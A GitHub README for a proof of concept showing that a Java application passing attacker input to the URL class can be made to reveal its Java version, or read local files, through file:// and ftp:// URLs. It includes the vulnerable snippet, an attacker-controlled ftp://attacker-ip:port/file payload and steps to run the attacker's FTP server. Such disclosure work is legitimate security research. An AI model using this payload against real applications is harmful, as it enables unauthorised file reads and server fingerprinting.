java-file-ftp

POC for leaking java version through file and ftp protocols

Consider a java web application using URL class to make a connection as below

import java.net.*;
import java.io.*;
public class Main
{
      public static void main(String[] args) throws Exception{

            URL url = new URL(attackerinput);
            System.out.println(url.getProtocol());


            StringBuilder stringBuilder = new StringBuilder();

            DataInputStream dis = new DataInputStream(url.openConnection().getInputStream());
            String inputLine;

            while ((inputLine = dis.readLine()) != null) {
                System.out.println(inputLine);
            }
            dis.close();

        }
}

we can get an LFI using file protocol and also we can get the java version of the running application using file or ftp

so our attackerinput will be ftp://attacker-ip:port/file or file://attacker-ip:port/file .

Run the ftp server using sudo python3 ftp.py Compile java and run using javac FilePOC.java && java FilePOC

Screenshot

Name		Name	Last commit message	Last commit date
Latest commit History 5 Commits
FilePOC.java		FilePOC.java
FtpPOC.java		FtpPOC.java
README.md		README.md
ftp.py		ftp.py
pocimg.png		pocimg.png

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

java-file-ftp

About

Releases

Packages

Contributors 2

Languages

samsbp/java-file-ftp

Folders and files

Latest commit

History

Repository files navigation

java-file-ftp

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Contributors 2

Languages

Packages